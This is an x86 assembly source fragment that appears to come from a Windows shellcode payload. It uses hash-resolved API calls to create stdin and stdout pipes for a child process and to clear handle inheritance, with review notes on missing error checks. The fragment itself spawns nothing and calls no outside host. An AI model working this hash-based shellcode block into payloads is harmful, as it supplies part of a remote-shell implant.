;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]
;-----------------------------------------------------------------------------;
; block_pipes: create the two anonymous pipes that will carry a child process's
; stdin and stdout. Both pipes are created with an inheritable
; SECURITY_ATTRIBUTES (so the child-side ends can be passed down), then the two
; ends the parent keeps for itself (child-stdout READ end, child-stdin WRITE end)
; have HANDLE_FLAG_INHERIT cleared again, so a child spawned with
; bInheritHandles=TRUE only receives the ends meant for it.
;
; Input: EBP is api_call (assumed to be a block_api-style stub: the caller
;        pushes the stdcall arguments right-to-left, then the API hash, then
;        calls EBP; the callee cleans its own arguments, so ESP after each
;        call is where it was before the arguments were pushed).
; Output (all relative to ESP after the block):
; esp+00 child stdin read file descriptor (inherited)
; esp+04 child stdin write file descriptor (not inherited)
; esp+08 child stdout read file descriptor (not inherited)
; esp+12 child stdout write file descriptor (inherited)
; esp+16 lpPipeAttributes structure (not used after block - 12 bytes)
; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
;           (EDX is caller-saved under the Win32 stdcall ABI, so treat it as
;           clobbered by the API calls as well; do not keep state in it.)
; NOTE(review): no return value is checked. If CreatePipe fails, the handle
; slots keep the 0 they were pushed with and SetHandleInformation is then
; called on handle 0; a later block that hands these slots to CreateProcess
; must not assume they are valid. There is no error label here to branch to.
; NOTE(review): nothing is closed in this block. Whatever consumes these slots
; is expected to close the child-side ends in the parent after spawning,
; otherwise a read on esp+08 may never see EOF when the child exits -
; confirm against the block that uses these handles.
;-----------------------------------------------------------------------------;
push 1 ; SECURITY_ATTRIBUTES.bInheritHandle = TRUE so pipe ends start out inheritable
push 0 ; SECURITY_ATTRIBUTES.lpSecurityDescriptor = NULL (default security)
push 0x0C ; SECURITY_ATTRIBUTES.nLength = 12; ESP now points at the structure
create_pipe_stdout:
push 0 ; slot for child stdout WRITE handle (pre-zeroed: stays 0 if CreatePipe fails)
mov ebx, esp ; ebx = &hWritePipe
push 0 ; slot for child stdout READ handle (pre-zeroed)
mov ecx, esp ; ecx = &hReadPipe
push 0 ; nSize = 0 (default pipe buffer size)
lea edi,[esp+12] ; lpPipeAttributes: the SECURITY_ATTRIBUTES built above sits 12 bytes above nSize
push edi
push ebx ; &hWritePipe (child stdout write end)
push ecx ; &hReadPipe (child stdout read end)
push 0x0EAFCF3E ; hash ( "kernel32.dll", "CreatePipe" )
call ebp ; CreatePipe( &hReadPipe, &hWritePipe, lpPipeAttributes, 0 ); 4 stdcall args cleaned by callee
create_pipe_stdin:
push 0 ; slot for child stdin WRITE handle (pre-zeroed)
mov ebx, esp ; ebx = &hWritePipe
push 0 ; slot for child stdin READ handle (pre-zeroed)
mov ecx, esp ; ecx = &hReadPipe
push 0 ; nSize = 0 (default pipe buffer size)
lea edi,[esp+20] ; lpPipeAttributes: same structure, now 20 bytes up (two more handle slots were pushed)
push edi
push ebx ; &hWritePipe (child stdin write end)
push ecx ; &hReadPipe (child stdin read end)
push 0x0EAFCF3E ; hash ( "kernel32.dll", "CreatePipe" )
call ebp ; CreatePipe( &hReadPipe, &hWritePipe, lpPipeAttributes, 0 ); ESP is now 28 bytes below entry
no_inherit_read_handle: ; the parent keeps the READ end of child stdout - make sure the child cannot inherit it
mov ebx,[esp+8] ; handle VALUE of child stdout read end, as written by the first CreatePipe
push 0 ; dwFlags = 0 -> clear the masked flag
push 1 ; dwMask = HANDLE_FLAG_INHERIT
push ebx ; hObject = child stdout read handle
push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation)
call ebp ; SetHandleInformation( hStdoutRd, HANDLE_FLAG_INHERIT, 0 ); 3 stdcall args cleaned by callee
no_inherit_write_handle: ; the parent keeps the WRITE end of child stdin - make sure the child cannot inherit it
mov ebx,[esp+4] ; handle VALUE of child stdin write end, as written by the second CreatePipe
push 0 ; dwFlags = 0 -> clear the masked flag
push 1 ; dwMask = HANDLE_FLAG_INHERIT
push ebx ; hObject = child stdin write handle
push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation)
call ebp ; SetHandleInformation( hStdinWr, HANDLE_FLAG_INHERIT, 0 ); ESP unchanged by this call